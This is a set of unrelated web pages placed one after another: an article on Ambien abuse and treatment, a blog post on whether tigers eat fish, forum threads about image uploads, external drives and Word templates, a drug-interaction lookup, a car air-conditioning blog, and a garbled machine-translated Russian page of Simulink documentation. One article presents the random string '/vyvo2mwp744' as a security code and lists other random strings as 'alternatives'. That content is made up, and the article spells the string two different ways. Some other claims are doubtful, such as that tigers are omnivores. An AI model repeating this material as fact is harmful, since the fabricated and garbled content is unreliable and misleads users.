Wednesday, May 12, 2021 Overview Zolpidem, also known as “Ambien” is one of the most common drugs used as a sleep aid in America, and functions as a hypnotic sedative. Ambien is classified as a nonbenzodiazepine, a class of drugs that mimics some of the effects of benzodiazepines but with a smaller capacity for dependency and abuse. Despite this, Ambien is still abused intentionally for its hallucinogenic properties when taken without sleeping, as well as unintentionally due to its high capacity for building tolerance. Sleeping pills are a common threat in the U.S, with 30,149 hospitalizations reported due to sleeping pills in the U.S. in 2011 alone.1 Ambien is both effective and dangerous due to its effect on GABA receptors in the brain, which control a wide variety of neurological functioning. The primary danger behind Ambien is how easy it is to build a tolerance to it, as well as withdrawals that come from overuse of the drug, which can lead to seizures. Ambien exhibits short-term effects similar to other sleeping pills including drowsiness, relaxation, heavy limbs, and loss of coordination. Long term abuse of Ambien can lead to a variety of physiological and mental ailments including depression, digestive problems, anxiety, and neurological decay. Recovery from Ambien can be effective through the use of various medications to minimize the need for such potent sleeping pills as well as therapeutic treatments. Rehabilitation facilities also offer extensive resources for recovering from Ambien addiction in a safe, stable, and comfortable manner. What is Ambien? Zolpidem, a drug often known by its brand name “Ambien” is a legal prescription hypnotic sedative that is traditionally prescribed for severe sleep disorders such as insomnia. Ambien is perhaps known best for its ability to produce potent delirium, dissociation, and hallucinations if taken without falling asleep quickly enough – a characteristic that is sometimes abused as a high. Zolpidem is similar to many other prescription sleeping pills, which includes Amobarbital, Eszopiclone, and Zaleplon, among many others. These drugs are similar due to their similar physical and mental effects, as well as their classification as nonbenzodiazepines. Nonbenzodiazepines are a drug class primarily characterized by their psychoactive properties which closely mimic those of benzodiazepines. Sleeping pills are a severely understated danger due to their potential for abuse, addictiveness, ease of overdosing, and dangerous effects when combined with other drugs. In 2011 there were a reported 30,149 hospitalizations in the United States attributed to sleeping pills, including Ambien. With over 8.6 million Americans regularly using prescription sleeping pills, this presents a serious risk.2 Ambien is classified as a Schedule IV drug Controlled Substances Act (CSA), meaning that Ambien is classified as having a low potential for abuse as well as accepted medicinal usage in the U.S. How Does Ambien Addiction Work? Ambien’s effectiveness as a sleep aid can primarily be attributed to its interaction with GABA, a common inhibitory neurotransmitter that is responsible for a large amount of various neurological functioning. Ambien is classified as a selective GABA medicine, meaning that Ambien won’t have an effect on other essential GABA functions such as muscle control, but will instead only utilize its tranquilizing effect on GABA receptors responsible for sleep. These selective GABA medicines are particularly good at functioning as sleep aids because they have a much faster onset and are metabolized by the body much quicker, allowing them to quickly promote sleep while being completely metabolized before waking up, which greatly reduces side effects of less selective medications. In addition, the selective properties of Ambien makes it less prone to physical dependency and addiction than less selective sleeping pills, as well as  other nonbenzodiazepine and benzodiazepine drugs. However, Ambien is still notable for its potential for psychological dependency, as well as its potential to be abused recreationally. Short and Long Term Effects Ambien is taken orally in the form of compressed tablets or capsule pills. Onset is relatively quick for being taken orally, and can begin to take effect in around 20-30 minutes. Remaining awake after onset can result in a variety of hallucinogenic and other psychoactive effects. When remaining awake after ingestion, users report short-term mental effects such as feelings of: • Euphoria • Hallucinations • Reduced inhibitions • Depersonalization • Derealization • Relaxation And physical effects such as: • Sleep walking and other activities performed while sleeping • Drowsiness • Loss of coordination • Heaviness of limbs Repeated long-term use of Ambien leads to physical side effects such as: • Neurological damage – Frequent abuse of nonbenzodiazepines as well as other GABAeffecting drugs such as benzodiazepines through Ambien can lead to distinct cognitive impairment when abused. This can manifest in effects such as memory loss, sleep disturbances, anhedonia, and disorientation. • Diminished digestive health – Digestive health is noticeably diminished in the body of a frequent Ambien user due to a reduction in digestive activity. This can lead to weakened gut fauna, cramping, nausea, constipation, and diarrhea. • Muscle problems – Because Ambien functions as a sedative, prolonged use of Ambien can result in coordination and muscular difficulties. This can include a general loss of motor coordination, muscle cramping and pain, and chronic muscle fatigue. • Insomnia – Due to frequent interruptions in ordinary circadian activity and damage done to GABA receptors with repeated abuse, Ambien users often experience worsening sleeping problems, developing into insomnia even in those who originally took Ambien to treat insomnia. Long-term use of Ambien also carries several mental side effects including: • Addiction – Although nonbenzodiazepine drugs are used as a comparatively less addictive alternative to benzodiazepines, Ambien still maintains a risk of both physical and psychological dependency. If abused for its high, Ambien can quickly become addictive. • Depression – Due to overstimulation of GABA receptors, Ambien frequently leads to depression due to the brain’s inability to properly manage its circadian rhythm and GABA receptors. • Anxiety – Anxiety is a frequent symptom of drug abuse in general, and is common in Ambien abuse due to external factors such as family or friends finding out, and internal factors from the chemistry of the drug itself. This can compound and develop into chronic paranoia. Other risks posed by Ambien abuse include: • Allergic reaction – Allergic reactions to Ambien are not uncommon, and can result in a variety of different side effects that can become fatal in the cases of severe allergic reaction. Symptoms of allergic reaction to Ambien include difficulty breathing, chest pain, skin rash, and hives. • Risk of overdose – Ambien holds a surprising potential for overdose for a variety of reasons. The most common cause of overdose is the tolerance that can build with frequent Ambien use. Even when taken as prescribed for sleeping problems, Ambien can still lose its effectiveness over time and no longer prove beneficial, which may lead some people to increase their dosage until it is effective again, which can often result in accidental overdose. Death by respiratory failure is common and predicated by signs of extreme disorientation and drowsiness, and survivors are at risk of permanent neurological damage. • Tolerance – Ambien as well as other sleeping pills are notorious for their quick ability to quickly build a physical tolerance in individuals with frequent usage. This can result in the drug no longer functioning as well as it did before, leading some users to either increase their dosage or develop a dependency on the drug from frequent usage. Ambien withdrawal is a difficult process to go through, and includes withdrawal symptoms such as: • Anxiety • Uncontrollable shaking and shivering • Fatigue • Nausea and vomiting • Sweating • Elevated heart rate • Depression • Muscle aches and cramps • Insomnia Methods of Treatment Pharmacological: Treatment for addiction to sleeping pills is particularly important to be done under careful supervision and with the right environment, as withdrawal from chronic sleeping pill usage faces the risk of seizures. As such, pharmaceutical treatment first begins with a tapered detoxification, usually under the supervision of a physician, so as to allow the body to safely rid itself of the drug. Only once the body has fully detoxified itself can treatment, pharmaceutical or therapeutic, be safely administered. While there are no drugs currently in use specifically for Ambien addiction, there are many drugs that are able to both treat symptoms of withdrawal as well as more importantly treating the sleep problems that led to Ambien addiction in the first place. In conjunction with important lifestyle changes that promote better healthier sleep, some may find it beneficial to gradually wean off of sleeping pills by using progressively less and less potent pills, with the goal of eventually using harmless more natural alternatives like melatonin. Melatonin is a hormone naturally produced by the pineal gland in the brain as one of the primary chemicals that promotes and regulated wakefulness and sleep. Melatonin is completely nontoxic and non-addictive, and is an excellent replacement for stronger sleeping pills. In addition, there are a wide variety of natural supplements that can be used to promote sleep, including drinks such as chamomile tea, pills such as powdered valerian root, and even foods such as turkey that contain tryptophan. Therapeutic: Other forms of treatment for Ambien addiction come in the form of psychological and behavioral therapies. These treatments focus on the behaviors and habits that led to addiction in the first place in an attempt to remove the root of addiction. Amongst these forms of treatment, Cognitive Behavioral Therapy (CBT) is one of the most common, and is growing in support from the scientific and clinical communities all the time. Cognitive Behavioral Therapy sees substance abuse such as Ambien addiction as a symptom of a greater psychological issue, and not a cause in and of itself. By utilizing reflective and analytic techniques, an addict is better able to understand what led them to addiction in the first place, change bad habits, and avoid behaviors that may trigger cravings. The twelve-step program, which is utilized by Alcoholic Anonymous, is a long-established method of treating drug and alcohol addiction. The twelve-step program works as a gradual method of guiding principles and pragmatic steps that can be taken to go from the depths of addiction and unhealthy habits to sobriety. These twelve steps are aimed at effectively recovering from compulsive and addictive behaviors, and addressing mental and behavioral problems that led to addiction in the first place. These twelve steps include both internal and external actions aimed at making amends for past mistakes, accepting responsibility for the actions that led to addiction, and moving forward to establish healthy habits and a positive mindset. Rehabilitation There are two main types of rehabilitation: inpatient and outpatient. Inpatient rehabilitation refers to programs that require patients to check themselves into a facility where they will undergo all rehabilitation treatment. Although inpatient rehabilitation requires a greater level of commitment, the facilities, environment, and support offered by these facilities are conducive to a stable and effective recovery. Inpatient facilities generally offer services such as psychiatrists, counselors, group therapy, and all of the living facilities necessary for a comfortable stay. The extensive support offered by these facilities, combined with an environment that is focused on self-improvement and wellness is a great combination for providing the motivation to push through the difficulties of withdrawal and to establish good healthy habits to prevent relapsing once you leave. This form of rehabilitation is effective for those who would benefit from a stricter more scheduled recovery in which the outside distractions and temptations of life won’t get in the way of focusing on recovery. Outpatient rehabilitation is based on the principle of spending only part of your time in recovery programs while offering you the freedom to continue daily living on your own. Generally these programs will require ten to twelve hours of commitment per week spent in a treatment facility participating in similar activities to those done in an inpatient facility such as group therapy, counseling, and even detox. While this does offer easier access to drugs, some may find being able to maintain their normal daily schedule more beneficial. This form of rehabilitation is effective for those who require more freedom and contact with friends and family. Both forms of rehabilitation are effective solutions at combatting Ambien addiction, and there is a variety of different types of both inpatient and outpatient rehabilitation to suit the personal needs of each individual. References 1. Ruiz, P., & Strain, E. (2011) Substance Abuse: A Comprehensive Textbook, Fifth Edition. Philadelphia, PA: Lippincott Williams & Wilkins. 2. Aleccia, Jonel. “Sleepless in the States: Nearly 9 Million Pop Pills for Shut-Eye.” NBCNews.com, NBCUniversal News Group, 29 Aug. 2013, www.nbcnews.com/health/sleepless-states-nearly-9million-pop-pills-shut-eye-study-8C11026819.  
Do Tigers Eat Fish (The Answer May Surprise You) Tigers are one of the most fearsome and largest of the big cats. They are one of the world’s greatest natural hunters, adaptable and cunning.  Do Tigers Eat Fish (The Answer May Surprise You) When it comes to their diet, they are first and foremost natural predators with a love for the raw flesh and meat of prey… but do they eat fish?  If you’re curious about it, read on to find out all you need to know… the answers may surprise you! Where Do Tigers live? You’ll usually find tigers living in India, but you can also find them in places like Siberia, Sumatra, China, Nepal, and other places in Southwest Asia.  They prefer environments that have lots of trees and open spaces to move around and hunt in, so they can be found in grasslands, plains, rainforests, and savannahs.  The Diet Of A Tiger Adult tigers need around 9kg of food a day in order to stay healthy and survive. Sometimes they are overindulgent and they can eat up to a staggering 50kg of food in a single meal!  A tiger’s diet mainly consists of raw meat. They are predators and eat a lot of prey. Tigers usually eat things like deer, boar, wild pigs, buffalo, and in some cases, young elephants.  On very rare occasions, they have been known to attack and eat humans. The most well-known of these attacks were from a tiger known as The Champawat Tigress.  She attacked and killed over 400 humans and when she was finally put down, they discovered both sets of her canines were damaged and she couldn’t pierce the skin of normal tiger prey, so she was attacking and eating humans out of necessity.  Though they do eat meat, tigers are technically omnivores. They are very adaptable and if they can’t find the appropriate food, they will resort to eating other things in order to survive.  On top of their usual diet of deer and boar, they will also eat things like berries, grass, and fruits. They also eat rodents, including mice, chinchillas, and agoutis. Do Tigers Like To Swim? Do Tigers Like To Swim? Although cats are known for their hatred of water, tigers really love it. They are excellent swimmers and spend a lot of time in rivers. As cubs, tigers are encouraged and taught to swim by their mothers, though some cubs can die in the water. But the cubs that do learn how to swim and survive are set up for a better future as water is a big part of a tiger’s life.  Tigers use rivers and lakes to hunt, but they also use them for leisure. In their natural habitat, you would see tigers frequently like to take baths in bodies of water. The water also has a cooling effect that helps in the hot summer months to keep their body temperature down. Tigers are nocturnal hunters, so cooling down at night isn’t an issue, it’s more during the day they need to do this in order to stay comfortable.  They can swim in rivers as wide as 7km and they usually swim about 29km a day during their patrols. Tigers usually keep their heads above the water though as they don’t like to get water in their eyes, but if they are hunting in the water, they will occasionally dive below for a very short period of time.  Another thing to note is that tigers will attack and eat crocodiles if they are in the water. Crocodiles aren’t always their first choice of food, but if they are out for a swim and hungry, they won’t turn the opportunity down. Do Tigers Eat Fish? The short answer? Yes, tigers do eat fish, but it’s more a question of do they want to eat fish? Because they prefer fleshy, meaty prey, fish are not ideal candidates to fill them up. Fish are too small and they don’t come across them very often.  Tigers are attracted to the smells of their prey, finding them appetizing straight away, which activates their hunting instincts. When fish are swimming around in the rivers and lakes, they don’t really have a strong smell, so this might be another reason tigers generally ignore them.  But tigers are clever animals and if they can’t find the appropriate food, they will resort to eating almost whatever they need to. Fish are one of their backup options if their regular food sources are a bit sparse.  Tigers live inland, usually in grasslands, rainforests, savannahs, and even mangrove swamps. So they don’t cross paths with fish very often, but when they do, they’ll find them in rivers. So if they are going to eat fish, they will be of the freshwater variety.  Tigers are excellent swimmers, which might surprise you because they are cats. They spend a lot of time in the water and will hunt the prey that dwells there. Fish are no exception.  If they are hunting fish, they will swim in the river and even dive down to find them. Tigers will eat all sorts of freshwater fish, including salmon, carp, tengra, river eel, and pink perch.  Tigers have also been known to eat fish in captivity. Lots of zookeepers tend to feed them fish because it’s easier to obtain in larger quantities. The tigers will eat the fish so they can survive, but they’d definitely prefer to have some raw deer meat instead!  Conclusion In regards to their diet, yes, tigers do eat fish, but eating fish is definitely not their first choice. They will look for other options before they resort to eating fish.  Tigers are adept hunters and will do whatever they need to do, eat whatever they need to eat in order to sustain themselves and survive, so if they really can’t find the appropriate prey, they will substitute with fish.  Tigers are one of the smartest and most adaptable of the big cat families. Although your housecats love a good tin of tuna, tigers more often than not wouldn’t be too happy with this as a first choice meal! Joe Edwards Latest posts by Joe Edwards (see all)
R 1 Message  •  70 Points Fri, Dec 3, 2021 4:26 PM unable to upload image error 0x40 Hello, I'm unable to upload any images to my website, I get an error message saying: "oops! your upload failed due to network or server issue." The message includes a 1800 phone number to call for help, but I'm unable to call this number as I'm based outside the US and the call will not connect. I'm using a windows 10 PC Please help ASAP. Many thanks R This conversation is no longer open for comments or replies and is no longer visible to community members. 60 Messages  •  660 Points 2 m ago The image must be jpg, png or gif. Upload your image using lunapic.com to rename and resize your image to suit your project. • JPEG with Transparent Background - The JPEG file format doesn't support transparent backgrounds. If your picture has a transparent background, save the image as a PNG or GIF. • File Name - If the image file name is longer than 80 characters, including the file extension, the image won't upload into the Library. Shorten the file name - you can always rename it and add a description after you've uploaded it. • File Size and Width - Images with a file size larger than 5MB or wider than 1200 pixels won't upload to the Library. Check the size of your file and reduce it using your image editor before trying to upload it again. Brand User 228 Messages  •  22.1K Points 2 m ago A common suggestion we ask is to try renaming the image and uploading it once again. Can you try that and see if it works?
Skip to Content Drug interactions between Imodium and Tecfidera Results for the following 2 drugs: Imodium (loperamide) Tecfidera (dimethyl fumarate) Interactions between your drugs There were no interactions found in our database between Imodium and Tecfidera. However, this does not necessarily mean no interactions exist. Always consult with your doctor or pharmacist. Imodium A total of 639 drugs (3828 brand and generic names) are known to interact with Imodium. Tecfidera A total of 95 drugs (265 brand and generic names) are known to interact with Tecfidera. Drug and food interactions Moderate loperamide food Applies to: Imodium (loperamide) Alcohol can increase the nervous system side effects of loperamide such as dizziness, drowsiness, and difficulty concentrating. Some people may also experience impairment in thinking and judgment. You should avoid or limit the use of alcohol while being treated with loperamide. Do not use more than the recommended dose of loperamide, and avoid activities requiring mental alertness such as driving or operating hazardous machinery until you know how the medication affects you. Talk to your doctor or pharmacist if you have any questions or concerns. Switch to professional interaction data Minor dimethyl fumarate food Applies to: Tecfidera (dimethyl fumarate) Consumer information for this minor interaction is not currently available. Some minor drug interactions may not be clinically relevant in all patients. Minor drug interactions do not usually cause harm or require a change in therapy. However, your healthcare provider can determine if adjustments to your medications are needed. For clinical details see professional interaction data. Therapeutic duplication warnings No therapeutic duplications were found for your selected drugs. Drug Interaction Classification The classifications below are a guideline only. The relevance of a particular drug interaction to a specific patient is difficult to determine using this tool alone given the large number of variables that may apply. Major Highly clinically significant. Avoid combinations; the risk of the interaction outweighs the benefit. Moderate Moderately clinically significant. Usually avoid combinations; use it only under special circumstances. Minor Minimally clinically significant. Minimize risk; assess risk and consider an alternative drug, take steps to circumvent the interaction risk and/or institute a monitoring plan. Unknown No information available. Do not stop taking any medications without consulting your healthcare provider. Further information Always consult your healthcare provider to ensure the information displayed on this page applies to your personal circumstances. Hide
Advertisement Online security has been elevated to a major priority in the current digital era. In the digital age we live in now, online security has become a top priority. With the number of cyber threats growing all the time, it’s more important than ever to protect our personal information with strong security measures. /Vyvo2mwp744 is one of these codes that has become more popular in recent years. But what is different about this code?. In this article, we’ll talk about how important it is to use and understand /vyvo2mwp744 as a key part of your online security strategy and management. So, get ready to learn more and take charge of your own safety online. What Is /vyvo2mwp744? The use of this security code increases a system’s or procedure’s level of security. In order to restrict access to sensitive information or assets, /vyvo2mwp744 was created. Password protection can be used by system administrators to guarantee that only authorized users have access to sensitive data and assets. How To Use /vyvo2mwp744? This kind of code can be used for a variety of things, including encryption keys, PIN codes, security tokens, and access codes. Although each kind of /vyvo2mwp744 has a slightly different function, they are all meant to aid in safeguarding sensitive information and assets. Pin Codes A personal identification number (PIN) is a security code that is commonly used in banking, credit card transactions, and other secure applications. PINs are typically numeric and are used to authenticate the user. Access Codes In order to gain entry to a specific building or room, a unique access code must be used. They are usually entered using a keypad or card reader and can be either numeric or alphanumeric. Passwords are codes used to verify the identity of the user before granting them access to a networked computer, website, or other digital resource. Passwords are used to restrict access to sensitive information and can include letters, numbers, and special characters. One-Time Passwords (OTPs) OTPs are one-time passwords that are generated for a single use. They are frequently used in two-factor authentication systems to add an extra layer of security. Security Tokens These are concrete objects that produce one-off codes for authentication purposes. With a security token, users can log into password-protected websites, networks, and software. Biometric Codes Biometric codes verify a user’s identity by using unique physical characteristics such as fingerprints or facial recognition. Codes for Decryption Sensitive information can be encrypted and decrypted with the help of encryption keys. They are commonly used in conjunction with other safeguards to keep private data safe. How Does the Security Code /vyvo2mwp744 Work? The security code /vyvomwp744 is a made-up, random string of characters used to prevent unauthorized access to the site. The purpose of this code is to ensure that the user is human and not a spambot. Every time a user tries to log in, a new /vyvomwp744 security code is generated and sent to their email. After receiving this code, the user should input it into the site’s login form. Advertisement This system aids in preventing automated attacks and ensuring that only genuine users have access to the site. Benefits of Using /vyvo2mwp744 One of the key advantages of using security codes is the capacity to protect sensitive information from unauthorized access. A system can check that a user has the right authority to access the data or asset by asking for a security code, preventing access by unauthorized users. Improved Security:  Security is improved because security codes add an extra layer of defense to systems or operations. They can aid in preventing concerns with security such as identity theft and cyberattacks. Both people and businesses can help reduce the likelihood of costly security events by using security codes. Regulation Compliance:  Security codes are necessary for many businesses and organizations to comply with requirements. The Payment Card Industry Data Security Standard (PCI DSS) mandates that all businesses that accept credit card payments employ robust codes and other security measures to secure private data. Accountability:  Security codes can also assist in ensuring responsibility. In order to access a system or process, users must first input a security code. This makes it simpler to monitor who and when accessed the system or process. When fraud or other unlawful activity is suspected, it might be extremely important. Usability:  A lot of security codes are made to be straightforward to use. Keypads or other electronic devices are widely used to enter access and PIN codes, for instance. Without much training or technical understanding, people may enter the code quickly and effortlessly. Vulnerability To Theft:  If a security code is taken, an unauthorized person may use it to access valuable information or property. This is particularly true when the security code has to be better secured, like when it is written down on paper or kept in an unprotected digital file. Cost:  Implementing security codes can be costly, particularly for businesses that do it across numerous people or systems. Security codes may be inconvenient for users, depending on how they are implemented. For instance, if a user must enter a security code each time they access a system or asset, their workflow may be slowed down or aggravated. The Difficulty In Remembering:  The complexity of many security codes makes it challenging to memorize them. It can be challenging for users to employ several security codes across various systems or procedures. Overreliance On Technology:  Utilizing security codes may sometimes result in a reliance on technology that is excessive. Even if they have the right security code, users might not be able to access information or assets if a system or process malfunctions or is compromised. False Sense Of Security:  Using security codes may make consumers believe they are more secure than they actually are. Users could assume their data or assets are secure because a security code exists, even if the system or process itself has other weaknesses. /Vyvo2mwp744 Alternatives • /igibiekxg1o • /oe06x04q1vo • /gefyxajsefw • /t606myn36vc • /ycycwf4wir0 • /zno8mkijzve • /zwzhanbf • /tzujjpbhec4 • /4r17o1grdty • /5ax0kflgous • /c6jd1eire78 • /cydvao8rtki • /dbrjna60mdm • /dffzp_kifvq • /dhrvyjj9djc • /f8ht6n4vnse • /hcg-nmwlt5i • /hoo042nzsc4 • /oluxyaw82r4 Conclusion Security codes like /vyvo2mwp744 are critical for protecting your data and online accounts. Using a security code safeguards your data against cyber threats and prevents unauthorized access to your accounts. It is critical to understand how security codes work and why they are important in order to use them effectively and avoid security breaches. With the right knowledge and precautions, you can keep your security code private and secure while also preventing unwanted intrusions into your data. Loading... LEAVE A REPLY Please enter your comment! Please enter your name here 2 + 9 =
Announcement: Upgrade to macOS Mojave With features like Dark Mode, Stacks, and four new built-in apps, macOS Mojave helps you get more out of every click. 
Find out how to upgrade to macOS Mojave > https://support.apple.com/macos/mojave Looks like no one’s replied in a while. To start the conversation again, simply ask a new question. Question: Question: How To Replace External Hard Drive So System Finds Files After Switch I need to replace an external hard drive. What is the best way to go about this so when I am done the OS and individual pieces of software finds the files automatically. In the past I tried naming the new drive the same as the old drive but that did not help and I basically had to go into every piece of software and tell it that the file it is looking for that used to be on "External Drive X" is still on "External Drive X." Is there a way to make this happen more efficiently? I cannot find any sort of tutorial or help topic to assist. iMac, macOS Sierra (10.12.6) Posted on Reply User profile for user: MGarbowski Question: How To Replace External Hard Drive So System Finds Files After Switch
323-255-7711 4802 EAGLE ROCK BLVD., LOS ANGELES CA 90041 What may possibly be the biggest car crisis that can happen in the middle of the Massachusetts summer’s sweltering heat? You got it: your car’s air conditioner deciding to call it quits. On top of dealing with the summer heat, you don’t want to be panicking over the state of the rest of your car, too. But CarTek Collision in Eagle Rock is here to help! Check out these tips on how to diagnose a broken AC so you can get your car into the shop and back on the road cool and collected in no time. We’re guessing that you know that your car’s AC is out of whack (hence the lack of cool air despite your AC’s on setting), but weak air, warm air, no air—what can it all mean? Read about the following symptoms and their corresponding parts to help you diagnose the issue and whether it’s a quick fix or one that requires repair shop attention. Step One: Evaluate Temperature First, you’ll want to determine how your AC isn’t working. Here’s what to note regarding temperature: • Is the air temperature warmer than usual? • Does the air coming from the vents vary between hot and cold? • Does the air blow cold and then shut off? Temperature solutions: Many temperature problems indicate a low refrigerant level due to a leak. If not caught early, a pinhole-sized leak could cause major problems. Bring in your car for service as soon as you notice a change in the air. If your air conditioner starts out blowing cold air and then stops entirely, it could be that the refrigerant is freezing up. The quick solution to this is to shut off your AC for a brief time to let it thaw and then start it back up again. If this issue persists, it’s best to keep your cool and have a trained professional take a look. Step 2: Access Airflow Issues Another avenue of your AC’s functionality that you’ll want to consider is how the air is moving from the vents. The easiest way to do this is to observe the following: • Does the airflow feel weaker than usual? • Is there a lack of pressure altogether? • Are any odd noises coming from the vents while the AC’s on? • Are there any strange smells filtering through? Airflow issue solutions: Weak air flow could mean a whole host of issues in your air conditioning system, from a loose hose to a damaged ventilation fan, while odd noises point to a compressor problem. The simplest check you can do is inspecting your car’s cabin air filter. You’ll want to consult your model’s owner’s manual on filter replacement as well, but if you can see excessive debris and dirt on the filter, it’s a safe bet this is what’s impeding air flow or causing a funky smell. Step 3: Check Your Heat We know it’s summer and likely the last thing you want to do is turn on your car’s heat with the state of things already, but trust us on this one. If your heat doesn’t work either, your car likely has an issue with its blower motor and needs to be brought in for an inspection and repair. Your car’s air conditioning system is made up of a variety of components, and while going without heat in the winter is one thing, you don’t want to be stuck without AC when the scorching summer heat is around. Eagle Rock, Los Angeles, Pasadena and Glendale drivers, schedule an appointment online with CarTek Collision's service center today to ensure that you stay comfortable and safe in your ride year-round!
Super User is a question and answer site for computer enthusiasts and power users. It's 100% free, no registration required. Sign up Here's how it works: 1. Anybody can ask a question 2. Anybody can answer 3. The best answers are voted up and rise to the top Possible Duplicate: How to change the template that Word 2007 is based on? How do I change the default template for Word 2007? Now from Document Properties is says based on Normal.dotm. And how do I change Normal.dotm, Normal.dotx I can change but not Normal.dotm. share|improve this question marked as duplicate by alex, harrymc, BinaryMisfit Oct 9 '09 at 22:14 This question has been asked before and already has an answer. If those answers do not fully address your question, please ask a new question.      Since this question is a duplicate of this: superuser.com/questions/53172/…, I suggest closing this one since it has fewer answers. – alex Oct 9 '09 at 11:04      Fewer answers is good, as long as they answer the question correctly and adequately. Less to read one day that way. – Rook Oct 9 '09 at 19:54 • alt text -> Open -> Click "Templates". • Make sure the filter for "file type" is set to All Word Templates • Select Normal.dotm and click open • Make changes that you want to be defaults • Save share|improve this answer Not the answer you're looking for? Browse other questions tagged or ask your own question.
Загрузите данные сигнала для симуляции Загрузите данные сигнала для симуляции модели Можно использовать несколько разных подходов, чтобы загрузить данные в модель, включая: • Входные порты корневого уровня — данные сигнала Импорта из рабочей области, с помощью параметра конфигурации Input, чтобы импортировать его к входному порту корневого уровня Inport, Enable или блока Trigger. Чтобы импортировать много сигналов к входным портам корневого уровня, рассмотрите использование инструмента Root Inport Mapper. • Блок From File — Считанные данные из MAT-файла, выводя данные как сигнал. • Блок From Spreadsheet — Считанные данные из электронных таблиц Microsoft® Excel® или электронных таблиц CSV, выводя данные как один или несколько сигналов. • Исходные блоки — Добавляют исходный блок, такой блок Sine Wave, чтобы сгенерировать сигналы ввести с другим блоком. • Блок Signal Builder — Создает взаимозаменяемые группы кусочных линейных источников сигнала, чтобы использовать в модели. • Персистентные данные — Поток большие данные из MAT-файла в модель. Можно создать данные о входном сигнале в файле, переменной рабочей области или параметре модели. Можно использовать данные, вошел в систему предыдущая симуляция, из другого источника, или создайте данные сами. Чтобы определить который подход загрузки сигнала к использованию, смотрите Сравнение Методов Загрузки Сигнала. Блоки развернуть все InportСоздайте входной порт для подсистемы или внешнего входа EnableДобавьте включают порт к подсистеме или модели TriggerДобавьте триггер или функциональный порт к подсистеме или модели From FileЗагрузите данные из MAT-файла From SpreadsheetСчитайте данные из электронной таблицы From WorkspaceЗагрузите данные сигнала из рабочей области Signal BuilderСоздайте и сгенерируйте взаимозаменяемые группы сигналов, формы волны которых кусочны линейный Signal EditorОтобразите, создайте, отредактируйте и переключите взаимозаменяемые сценарии Функции развернуть все getRootInportMapСоздайте пользовательский объект, чтобы сопоставить сигналы с импортом корневого уровня convertToSlDatasetПреобразуйте содержимое MAT-файла к Simulink.SimulationData.Dataset объект getSlRootInportMapСоздайте пользовательский объект, чтобы сопоставить сигналы с импортом корневого уровня с помощью режима отображения Simulink createInputDatasetСгенерируйте объект набора данных для корневого уровня Inport или соедините шиной порты элемента в модели signalbuilder(Не рекомендуемый) Создавайте и получайте доступ к блокам Signal Builder signalBuilderToSignalEditorИмпортируйте данные сигнала и свойства от блока Signal Builder до блока Signal Editor getInputStringСоздайте список, разделенный запятыми переменных, чтобы сопоставить Simulink.BlockDiagram.getInitialStateВозвратите данные о начальном состоянии блок-схемы Simulink.Bus.createMATLABStructСоздайте структуры MATLAB, которые используют ту же иерархию и атрибуты как шины Simulink.SimulationData.createStructOfTimeseriesСоздайте структуру timeseries данные, чтобы загрузить как вход симуляции для шины signalEditorЗапустите редактор сигнала Параметры конфигурации Simulink Темы Загрузка сигнала Обеспечьте данные сигнала для симуляции Идентифицируйте требования данных сигнала модели и загрузите данные о входном сигнале. Обзор методов загрузки сигнала Изучите методы, доступные для импорта данных сигнала в модель. Сравнение методов загрузки сигнала Определите подход загрузки сигнала, который удовлетворяет ваши требования моделирования. Часто, отображение данных сигнала, чтобы базироваться импорт работает хорошо. Загрузите данные сигнала, который использует модули Загрузите данные сигнала, который использует модули из данных, вошел в систему предыдущая симуляция. Логгирование сигнала, блок To File и блок To Workspace могут включать информацию о модулях для Набора данных или Timeseries, регистрирующего форматы. Загрузите данные, вошел в систему другая симуляция Загрузите данные сигнала в модель, которая была зарегистрирована предыдущая симуляция. Загрузите данные, чтобы смоделировать непрерывный объект Импортируйте данные сигнала к непрерывной модели объекта управления, которая использует данные сигнала, который является гладким и непрерывен вовремя, с данные сигнала для каждой временной стоимости. Загрузите данные, чтобы протестировать дискретный алгоритм Протестируйте дискретный алгоритм путем импорта дискретных сигналов, которые являются сигналами, что вы задаете использование равномерно расположенных с интервалами временных стоимостей. Одно значение сигналов читается на каждом временном шаге, с помощью шага расчета исходного блока. Загрузите данные для входного теста Когда вы импортируете данные сигнала для больше всего входных тестов, попытайтесь минимизировать количество моментов времени. Данные сигнала, которые вы загружаете, включают выборки с пандусами и разрывами. Загрузите данные к Корневому Уровню Input port Загрузите данные к Корневому Уровню Input port Загрузите данные из рабочей области и примените их к входу корневого уровня. Загрузите данные о шине к Корневому Уровню Input port Импортируйте данные о шине к входным портам верхнего уровня путем ручного определения данных во Входном параметре конфигурации или при помощи инструмента Root Inport Mapper. Сопоставьте данные Используя корневой инструмент картопостроителя Inport Чтобы импортировать, визуализируйте, и сопоставьте сигнал и соедините шиной данные, чтобы базироваться импорт, используйте инструмент Root Inport Mapper. Корень карты данные сигнала Inport Откройте Корневой Инструмент Картопостроителя Inport и выберите режим отображения. Создайте данные сигнала для корневого отображения Inport Создайте данные для корневого отображения импорта с помощью определенных инструкций и соглашений. Создайте и отредактируйте данные сигнала Используйте Редактор Сигнала, чтобы создать и отредактировать входные сигналы, которые можно организовать для отображения порта корневого уровня или нескольких симуляций. Просмотрите и смотрите данные сигнала Просмотрите и смотрите данные сигнала прежде, чем сопоставить данные. Данные сигнала предварительного просмотра Входной сигнал предварительного просмотра или данные о шине с окном Signal Preview. Сопоставьте данные сигнала, чтобы базироваться Input port Сопоставьте данные сигнала, чтобы базироваться входные порты путем выбора режимов карты и опций и выбора данных. Интерпретируйте результаты отображения. Импортируйте данные сигнала для корневого отображения Inport Сигнал импорта и данные о шине для корневого отображения импорта. Можно также импортировать тестовые векторы из среды Simulink® Design Verifier™. Создайте и используйте пользовательские режимы карты Создайте пользовательские режимы карты, если вы не хотите использовать существующие режимы карты в инструменте Root Inport Mapper. Корневой Inport отображение сценариев Работа со сценариями в инструменте Root Inport Mapper. Создайте и сохраните сценарии и загрузите ранее сохраненные сценарии. Сгенерируйте Скрипты MATLAB для симуляции со сценариями После соединения сценария с моделью сгенерируйте скрипт MATLAB®, чтобы выполнить пакетные симуляции. Другие методы загрузки сигнала Загрузите данные Используя от блока рабочей области Загрузите данные сигнала с помощью блока From Workspace. Загрузите данные Используя от блока файла Загрузите данные сигнала с помощью блока From File. Загрузите Большие данные для симуляций Загрузите большие данные как вход симуляции. Рекомендуемые примеры
